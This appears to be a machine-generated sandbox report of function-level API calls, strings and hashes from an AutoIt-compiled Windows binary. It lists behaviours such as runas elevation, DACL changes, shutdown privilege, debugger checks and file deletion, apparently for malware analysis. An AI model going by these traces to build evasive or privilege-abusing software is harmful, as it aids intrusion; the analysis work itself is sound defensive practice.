GetLengthSid.ADVAPI32(?,00000008,?), ref: 00108A23
CopySid.ADVAPI32(00000000), ref: 00108A2A
AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 00108A5B
SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 00108A81
SetUserObjectSecurity.USER32(?,00000004,?), ref: 00108A95

Memory Dump Source

Source File: 0000000F.00000002.4150382750.00000000000B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 000B0000, based on PE: true

Associated: 0000000F.00000002.4150358383.00000000000B0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150484391.0000000000140000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150484391.0000000000166000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150552719.0000000000170000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150552719.0000000000174000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150608092.0000000000179000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_b0000_Welding.jbxd

Similarity

API ID: HeapSecurity$AllocDescriptorLengthObjectProcessUser$Dacl$CopyErrorInformationInitializeLast_memset
String ID:
API String ID: 3996160137-0
Opcode ID: 0dd04aae73d5d972d9f0d309a07ff25df3251bf94d0659ce8ac9c9f738801903
Instruction ID: 68f8e07329aa9b3c69aba92c6aa0332823000da683f1250b7a396845f0f0c817
Opcode Fuzzy Hash: 0dd04aae73d5d972d9f0d309a07ff25df3251bf94d0659ce8ac9c9f738801903
Instruction Fuzzy Hash: B4614975A00209FFDF01DFA5DC45AAEBB79FF48304F04812AF995A76A0DB719A04CB60

Function 000C5240 Relevance: 19.4, APIs: 8, Strings: 3, Instructions: 147windowCOMMON

Download Yara Rule

APIs

GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 000C526C
IsDebuggerPresent.KERNEL32 ref: 000C527E
GetFullPathNameW.KERNEL32(00007FFF,?,?), ref: 000C52E6

Part of subcall function 000C1821: _memmove.LIBCMT ref: 000C185B

Part of subcall function 000BBBC6: GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 000BBC07

SetCurrentDirectoryW.KERNEL32(?), ref: 000C5366
MessageBoxA.USER32(00000000,It is a violation of the AutoIt EULA to attempt to reverse engineer this program.,AutoIt,00000010), ref: 00100B2E
SetCurrentDirectoryW.KERNEL32(?), ref: 00100B66
GetForegroundWindow.USER32(runas,?,?,?,00000001,?,00166D10), ref: 00100BE9
ShellExecuteW.SHELL32(00000000), ref: 00100BF0

Part of subcall function 000C514C: GetSysColorBrush.USER32(0000000F), ref: 000C5156
Part of subcall function 000C514C: LoadCursorW.USER32(00000000,00007F00), ref: 000C5165
Part of subcall function 000C514C: LoadIconW.USER32(00000063), ref: 000C517C
Part of subcall function 000C514C: LoadIconW.USER32(000000A4), ref: 000C518E
Part of subcall function 000C514C: LoadIconW.USER32(000000A2), ref: 000C51A0
Part of subcall function 000C514C: LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 000C51C6
Part of subcall function 000C514C: RegisterClassExW.USER32(?), ref: 000C521C

Part of subcall function 000C50DB: CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 000C5109
Part of subcall function 000C50DB: CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 000C512A
Part of subcall function 000C50DB: ShowWindow.USER32(00000000), ref: 000C513E
Part of subcall function 000C50DB: ShowWindow.USER32(00000000), ref: 000C5147

Part of subcall function 000C59D3: _memset.LIBCMT ref: 000C59F9
Part of subcall function 000C59D3: Shell_NotifyIconW.SHELL32(00000000,?), ref: 000C5A9E

Strings

AutoIt, xrefs: 00100B23
It is a violation of the AutoIt EULA to attempt to reverse engineer this program., xrefs: 00100B28
runas, xrefs: 00100BE4

Memory Dump Source

Source File: 0000000F.00000002.4150382750.00000000000B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 000B0000, based on PE: true

Associated: 0000000F.00000002.4150358383.00000000000B0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150484391.0000000000140000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150484391.0000000000166000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150552719.0000000000170000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150552719.0000000000174000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150608092.0000000000179000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_b0000_Welding.jbxd

Similarity

API ID: LoadWindow$Icon$CurrentDirectory$CreateFullNamePathShow$BrushClassColorCursorDebuggerExecuteForegroundImageMessageNotifyPresentRegisterShellShell__memmove_memset
String ID: AutoIt$It is a violation of the AutoIt EULA to attempt to reverse engineer this program.$runas
API String ID: 529118366-2030392706
Opcode ID: 1644618acc037d62ebfcde17565ddbeffd0c0eb4c066b106344276c6f23ef7c2
Instruction ID: 4dca7a9009b973230876e426ee1736dc2d3be425ecc69871cc06c05457b3f6bd
Opcode Fuzzy Hash: 1644618acc037d62ebfcde17565ddbeffd0c0eb4c066b106344276c6f23ef7c2
Instruction Fuzzy Hash: DB51F434948248AECB12ABB0DC46FED7B74AF1A381F14416DF565621E3DFB05AC5CB21

Function 00130A3A Relevance: 16.9, APIs: 11, Instructions: 397registryCOMMON

Download Yara Rule

APIs

Part of subcall function 0013147A: CharUpperBuffW.USER32(?,?,?,?,?,?,?,0013040D,?,?), ref: 00131491

RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00130B0C

Part of subcall function 000B4D37: __itow.LIBCMT ref: 000B4D62
Part of subcall function 000B4D37: __swprintf.LIBCMT ref: 000B4DAC

RegQueryValueExW.ADVAPI32(?,?,00000000,?,00000000,?), ref: 00130BAB
RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,00000008), ref: 00130C43
RegCloseKey.ADVAPI32(000000FE,000000FE,00000000,?,00000000), ref: 00130E82
RegCloseKey.ADVAPI32(00000000), ref: 00130E8F

Memory Dump Source

Source File: 0000000F.00000002.4150382750.00000000000B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 000B0000, based on PE: true

Associated: 0000000F.00000002.4150358383.00000000000B0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150484391.0000000000140000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150484391.0000000000166000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150552719.0000000000170000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150552719.0000000000174000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150608092.0000000000179000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_b0000_Welding.jbxd

Similarity

API ID: CloseQueryValue$BuffCharConnectRegistryUpper__itow__swprintf
String ID:
API String ID: 1240663315-0
Opcode ID: 7d38839cbe4b5e457583d91cd4c41d3cccfbdb8742bbdac58696405a6ee0b579
Instruction ID: 5cc7d936d4c5a97e47fed83b850bc213cac968cd2525e875797f9cfe73b975e2
Opcode Fuzzy Hash: 7d38839cbe4b5e457583d91cd4c41d3cccfbdb8742bbdac58696405a6ee0b579
Instruction Fuzzy Hash: 8DE14E35204211AFC715DF25C895E6ABBE9EF89714F04896DF48ADB2A2DB30ED01CB52

Function 00124830 Relevance: 15.1, APIs: 10, Instructions: 83clipboardmemoryCOMMON

Download Yara Rule

APIs

OpenClipboard.USER32 ref: 00124857
EmptyClipboard.USER32 ref: 0012485D
GlobalAlloc.KERNEL32(00000002,?), ref: 00124872
CloseClipboard.USER32 ref: 00124911

Memory Dump Source

Source File: 0000000F.00000002.4150382750.00000000000B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 000B0000, based on PE: true

Associated: 0000000F.00000002.4150358383.00000000000B0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150484391.0000000000140000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150484391.0000000000166000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150552719.0000000000170000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150552719.0000000000174000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150608092.0000000000179000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_b0000_Welding.jbxd

Similarity

API ID: Clipboard$AllocCloseEmptyGlobalOpen
String ID:
API String ID: 1737998785-0
Opcode ID: f844dd1a2974bbb02457cb4566d32a6802acc8f356ee2ee67634da49202b872c
Instruction ID: 3f29f2d746f20369695180338fdee82ab81a093211845ae164dffceb7118ad8a
Opcode Fuzzy Hash: f844dd1a2974bbb02457cb4566d32a6802acc8f356ee2ee67634da49202b872c
Instruction Fuzzy Hash: AB21F9356052109FDB02AF61EC49F6E77A8EF48720F018019FE06D76B2CB70AD90CB94

Function 00113CE2 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 167fileCOMMON

Download Yara Rule

APIs

Part of subcall function 000D0284: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,000C2A58,?,00008000), ref: 000D02A4

Part of subcall function 00114FEC: GetFileAttributesW.KERNEL32(?,00113BFE), ref: 00114FED

FindFirstFileW.KERNEL32(?,?), ref: 00113D96
DeleteFileW.KERNEL32(?,?,00000000,?,?,?,?), ref: 00113E3E
MoveFileW.KERNEL32(?,?), ref: 00113E51
DeleteFileW.KERNEL32(?,?,?,?,?), ref: 00113E6E
FindNextFileW.KERNEL32(00000000,00000010), ref: 00113E90
FindClose.KERNEL32(00000000,?,?,?,?), ref: 00113EAC

Strings

\*.*, xrefs: 00113D41, 00113D4A, 00113D5F

Memory Dump Source

Source File: 0000000F.00000002.4150382750.00000000000B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 000B0000, based on PE: true

Associated: 0000000F.00000002.4150358383.00000000000B0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150484391.0000000000140000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150484391.0000000000166000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150552719.0000000000170000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150552719.0000000000174000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150608092.0000000000179000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_b0000_Welding.jbxd

Similarity

API ID: File$Find$Delete$AttributesCloseFirstFullMoveNameNextPath
String ID: \*.*
API String ID: 4002782344-1173974218
Opcode ID: 4fdf368f4bfa64acd8f06817eb03f0f56134b583db3ee86ca7eae5c6299e06fd
Instruction ID: 64c32b0b35f1365618dd413834627f7a33bb3160d3e5c1ef1b28581780689cfc
Opcode Fuzzy Hash: 4fdf368f4bfa64acd8f06817eb03f0f56134b583db3ee86ca7eae5c6299e06fd
Instruction Fuzzy Hash: DB51903580120DABCF19EBA0C992EEDB779AF16300F200169E452B7197EF316F49CB60

Function 0011FA36 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 120filesleepCOMMON

Download Yara Rule

APIs

Part of subcall function 000C1A36: _memmove.LIBCMT ref: 000C1A77

FindFirstFileW.KERNEL32(?,?,*.*,?,?,00000000,00000000), ref: 0011FA83
FindClose.KERNEL32(00000000), ref: 0011FB96

Part of subcall function 000B52B0: PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 000B52E6

Sleep.KERNEL32(0000000A), ref: 0011FAB3
_wcscmp.LIBCMT ref: 0011FAC7
_wcscmp.LIBCMT ref: 0011FAE2
FindNextFileW.KERNEL32(?,?), ref: 0011FB80

Strings

*.*, xrefs: 0011FA68

Memory Dump Source

Source File: 0000000F.00000002.4150382750.00000000000B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 000B0000, based on PE: true

Associated: 0000000F.00000002.4150358383.00000000000B0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150484391.0000000000140000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150484391.0000000000166000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150552719.0000000000170000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150552719.0000000000174000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150608092.0000000000179000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_b0000_Welding.jbxd

Similarity

API ID: Find$File_wcscmp$CloseFirstMessageNextPeekSleep_memmove
String ID: *.*
API String ID: 2185952417-438819550
Opcode ID: fe21f6517d8f43629a8719e13a14a52263088cc08e69606f68e186a827e714b5
Instruction ID: e2ade42805ee1e6d05daab6ec96888beb505d1970a7f5a172489845b5e8ef81e
Opcode Fuzzy Hash: fe21f6517d8f43629a8719e13a14a52263088cc08e69606f68e186a827e714b5
Instruction Fuzzy Hash: F54183B590421A9FCF19DF64CC55AEEBBB4FF09350F14417AE814A32A1EB309E85CB50

Function 000BF6A0 Relevance: 11.6, APIs: 1, Strings: 5, Instructions: 1132COMMON

Download Yara Rule

Strings

ERCP, xrefs: 000BF77F
VUUU, xrefs: 000BFA3B
VUUU, xrefs: 000F6225
VUUU, xrefs: 000BFA4D
VUUU, xrefs: 000BFA80

Memory Dump Source

Source File: 0000000F.00000002.4150382750.00000000000B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 000B0000, based on PE: true

Associated: 0000000F.00000002.4150358383.00000000000B0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150484391.0000000000140000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150484391.0000000000166000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150552719.0000000000170000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150552719.0000000000174000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150608092.0000000000179000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_b0000_Welding.jbxd

Similarity

API ID:
String ID: ERCP$VUUU$VUUU$VUUU$VUUU
API String ID: 0-1546025612
Opcode ID: 9ee208b9fed4e197da85f6068f2506275404659c3a3c445b32a23be8921a904c
Instruction ID: dffb8ce5b69263d10fd009b0c3442108b9545ec118d0c3e8f4c06cebbb7d119f
Opcode Fuzzy Hash: 9ee208b9fed4e197da85f6068f2506275404659c3a3c445b32a23be8921a904c
Instruction Fuzzy Hash: 16A25B70E0021ACBDF64DF58C9907FDB7F1BB54314F2481AAD95AA7680EB319E81DB90

Function 00114005 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 91fileCOMMON

Download Yara Rule

APIs

Part of subcall function 000D0284: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,000C2A58,?,00008000), ref: 000D02A4

Part of subcall function 00114FEC: GetFileAttributesW.KERNEL32(?,00113BFE), ref: 00114FED

FindFirstFileW.KERNEL32(?,?), ref: 0011407C
DeleteFileW.KERNEL32(?,?,?,?), ref: 001140CC
FindNextFileW.KERNEL32(00000000,00000010), ref: 001140DD
FindClose.KERNEL32(00000000), ref: 001140F4
FindClose.KERNEL32(00000000), ref: 001140FD

Strings

\*.*, xrefs: 0011404E

Memory Dump Source

Source File: 0000000F.00000002.4150382750.00000000000B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 000B0000, based on PE: true

Associated: 0000000F.00000002.4150358383.00000000000B0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150484391.0000000000140000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150484391.0000000000166000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150552719.0000000000170000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150552719.0000000000174000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150608092.0000000000179000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_b0000_Welding.jbxd

Similarity

API ID: FileFind$Close$AttributesDeleteFirstFullNameNextPath
String ID: \*.*
API String ID: 2649000838-1173974218
Opcode ID: d52aa292c22c9d04c792a00f2863849ad2e98a5e436d96f9ea90d4548deb3667
Instruction ID: 76ccbe3ce90d48f41d43ce5197f4cb1b6f5eb1796945d0d9712e379d8eb4256c
Opcode Fuzzy Hash: d52aa292c22c9d04c792a00f2863849ad2e98a5e436d96f9ea90d4548deb3667
Instruction Fuzzy Hash: C4315E350083859BC205EF64C895EEFB7A8BF9A704F444A2DF5E582193DB30DA49C763

Function 00115778 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 59shutdownCOMMON

Download Yara Rule

APIs

Part of subcall function 00109399: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 001093E3
Part of subcall function 00109399: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00109410
Part of subcall function 00109399: GetLastError.KERNEL32 ref: 0010941D

ExitWindowsEx.USER32(?,00000000), ref: 001157B4

Strings

, xrefs: 001157A2
SeShutdownPrivilege, xrefs: 00115784
@, xrefs: 001157A7

Memory Dump Source

Source File: 0000000F.00000002.4150382750.00000000000B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 000B0000, based on PE: true

Associated: 0000000F.00000002.4150358383.00000000000B0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150484391.0000000000140000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150484391.0000000000166000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150552719.0000000000170000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150552719.0000000000174000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150608092.0000000000179000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_b0000_Welding.jbxd

Similarity

API ID: AdjustErrorExitLastLookupPrivilegePrivilegesTokenValueWindows
String ID: $@$SeShutdownPrivilege
API String ID: 2234035333-194228
Opcode ID: 9043b462e40f5131698393b40bfc01d74db2897058a73b545aa2551d8a997517
Instruction ID: 23e73a7a5de72ec86b687bed0743592772a569ed867791be77af2c3775c7cedc
Opcode Fuzzy Hash: 9043b462e40f5131698393b40bfc01d74db2897058a73b545aa2551d8a997517
Instruction Fuzzy Hash: 5601F231754722EAE72C63A9DC8BBFB7659EB85740FA40139F953D60E2EB605C808160

Function 000C5D13 Relevance: 9.2, APIs: 6, Instructions: 223COMMON

Download Yara Rule

APIs

GetVersionExW.KERNEL32(?), ref: 000C5D40

Part of subcall function 000C1821: _memmove.LIBCMT ref: 000C185B

GetCurrentProcess.KERNEL32(?,00140A18,00000000,00000000,?), ref: 000C5E07
IsWow64Process.KERNEL32(00000000), ref: 000C5E0E
FreeLibrary.KERNEL32(00000000), ref: 000C5E5F
GetSystemInfo.KERNEL32(00000000), ref: 000C5E90
GetSystemInfo.KERNEL32(00000000), ref: 000C5E9C

Memory Dump Source

Source File: 0000000F.00000002.4150382750.00000000000B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 000B0000, based on PE: true

Associated: 0000000F.00000002.4150358383.00000000000B0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150484391.0000000000140000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150484391.0000000000166000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150552719.0000000000170000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150552719.0000000000174000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150608092.0000000000179000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_b0000_Welding.jbxd

Similarity

API ID: InfoProcessSystem$CurrentFreeLibraryVersionWow64_memmove
String ID:
API String ID: 551412401-0
Opcode ID: 580ec2f2fe32f30be933fdda2e3cb7e4e6e9a4e52edaa6f0ffa6fdb694b2ec86
Instruction ID: 64feae22f5b60498fbcc986de67000b9585071e510987b18fa76d2eead56d5d9
Opcode Fuzzy Hash: 580ec2f2fe32f30be933fdda2e3cb7e4e6e9a4e52edaa6f0ffa6fdb694b2ec86
Instruction Fuzzy Hash: D691F635549BC0DEC735CB788850AAFBFE56F2A301B880A5ED0C793A82D274B588D759

Function 000B1663 Relevance: 7.9, APIs: 5, Instructions: 379COMMON

Download Yara Rule

APIs

Part of subcall function 000B29E2: GetWindowLongW.USER32(?,000000EB), ref: 000B29F3

DefDlgProcW.USER32(?,?,?,?,?), ref: 000B1DD6
GetSysColor.USER32(0000000F), ref: 000B1E2A
SetBkColor.GDI32(?,00000000), ref: 000B1E3D

Part of subcall function 000B166C: DefDlgProcW.USER32(?,00000020,?), ref: 000B16B4

Memory Dump Source

Source File: 0000000F.00000002.4150382750.00000000000B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 000B0000, based on PE: true

Associated: 0000000F.00000002.4150358383.00000000000B0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150484391.0000000000140000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150484391.0000000000166000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150552719.0000000000170000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150552719.0000000000174000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150608092.0000000000179000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_b0000_Welding.jbxd

Similarity

API ID: ColorProc$LongWindow
String ID:
API String ID: 3744519093-0
Opcode ID: 0ba48b6bcbacc8eb5230c4f55c2aebb850c59770ad2e58ad24702cb460cc3597
Instruction ID: 63da7ea3087c894069471f06b3cb25cef5b12c6f23cd9373b3c64aa3082baa94
Opcode Fuzzy Hash: 0ba48b6bcbacc8eb5230c4f55c2aebb850c59770ad2e58ad24702cb460cc3597
Instruction Fuzzy Hash: 01A15975109444BEDB3CAB6A9C69EFF39DDDB46301FA4011AF402EA1D6DB20DD41C2B6

Function 0011C2FF Relevance: 7.6, APIs: 5, Instructions: 143fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(?,?), ref: 0011C329
_wcscmp.LIBCMT ref: 0011C359
_wcscmp.LIBCMT ref: 0011C36E
FindNextFileW.KERNEL32(00000000,?), ref: 0011C37F
FindClose.KERNEL32(00000000,00000001,00000000), ref: 0011C3AF

Memory Dump Source

Source File: 0000000F.00000002.4150382750.00000000000B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 000B0000, based on PE: true

Associated: 0000000F.00000002.4150358383.00000000000B0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150484391.0000000000140000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150484391.0000000000166000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150552719.0000000000170000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150552719.0000000000174000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150608092.0000000000179000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_b0000_Welding.jbxd

Similarity

API ID: Find$File_wcscmp$CloseFirstNext
String ID:
API String ID: 2387731787-0
Opcode ID: cde4493fb830574c0e406f4ccfa5160d3cd14ffad0e524818e746bf12b9005e0
Instruction ID: d8376406b2db6e711698d5c5bf88a51d260277b6291790aa3bc8aec8d36a5df4
Opcode Fuzzy Hash: cde4493fb830574c0e406f4ccfa5160d3cd14ffad0e524818e746bf12b9005e0
Instruction Fuzzy Hash: CC517C756046029FD718DF68D490EEAB3E4FF49314F10462DF96A877A2DB30AD44CB91

Function 001359B3 Relevance: 7.6, APIs: 5, Instructions: 69windowCOMMON

Download Yara Rule

APIs

IsWindowVisible.USER32 ref: 00135A02
IsWindowEnabled.USER32 ref: 00135A10
GetForegroundWindow.USER32(?,?,00000001), ref: 00135A1D
IsIconic.USER32 ref: 00135A2B
IsZoomed.USER32 ref: 00135A39

Memory Dump Source

Source File: 0000000F.00000002.4150382750.00000000000B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 000B0000, based on PE: true

Associated: 0000000F.00000002.4150358383.00000000000B0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150484391.0000000000140000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150484391.0000000000166000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150552719.0000000000170000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150552719.0000000000174000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150608092.0000000000179000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_b0000_Welding.jbxd

Similarity

API ID: Window$EnabledForegroundIconicVisibleZoomed
String ID:
API String ID: 292994002-0
Opcode ID: 923e21595c474acbac8b55aa6d24a7aa6b4b3208df03c2d5b758c13dc6426b71
Instruction ID: 5eaf106c6e0d08699f809bcbf9eccac138347e790e58b40c380ee90e75368a33
Opcode Fuzzy Hash: 923e21595c474acbac8b55aa6d24a7aa6b4b3208df03c2d5b758c13dc6426b71
Instruction Fuzzy Hash: 281157323009119FE7221F268C80BAE7B9AFF48B20F014129F846D7242CB30ED01CAE0

Function 000F0030 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 17timeCOMMON

Download Yara Rule

APIs

GetLocalTime.KERNEL32(?), ref: 000F0034
__swprintf.LIBCMT ref: 000F0065

Strings

%.3d, xrefs: 000F003F
WIN_XPe, xrefs: 000F00A4

Memory Dump Source

Source File: 0000000F.00000002.4150382750.00000000000B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 000B0000, based on PE: true

Associated: 0000000F.00000002.4150358383.00000000000B0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150484391.0000000000140000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150484391.0000000000166000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150552719.0000000000170000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150552719.0000000000174000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150608092.0000000000179000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_b0000_Welding.jbxd

Similarity

API ID: LocalTime__swprintf
String ID: %.3d$WIN_XPe
API String ID: 2070861257-2409531811
Opcode ID: dbb6c017822ae0489647d18c532e73251e25e7110310be4503197fa390731995
Instruction ID: 1fe85b973448a8c92c1902fe447e812027e100bad6d2158ad81b1b513a01590e
Opcode Fuzzy Hash: dbb6c017822ae0489647d18c532e73251e25e7110310be4503197fa390731995
Instruction Fuzzy Hash: 9BD0127280821CEAC7259A90CD44EFD737CEB08304F144052F706E2442DB358798BA22

Function 00114148 Relevance: 6.1, APIs: 4, Instructions: 85processCOMMON

Download Yara Rule

APIs

CreateToolhelp32Snapshot.KERNEL32 ref: 0011416D
Process32FirstW.KERNEL32(00000000,?), ref: 0011417B
Process32NextW.KERNEL32(00000000,?), ref: 0011419B
CloseHandle.KERNEL32(00000000), ref: 00114245

Memory Dump Source

Source File: 0000000F.00000002.4150382750.00000000000B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 000B0000, based on PE: true

Associated: 0000000F.00000002.4150358383.00000000000B0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150484391.0000000000140000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150484391.0000000000166000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150552719.0000000000170000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150552719.0000000000174000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150608092.0000000000179000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_b0000_Welding.jbxd

Similarity

API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
String ID:
API String ID: 420147892-0
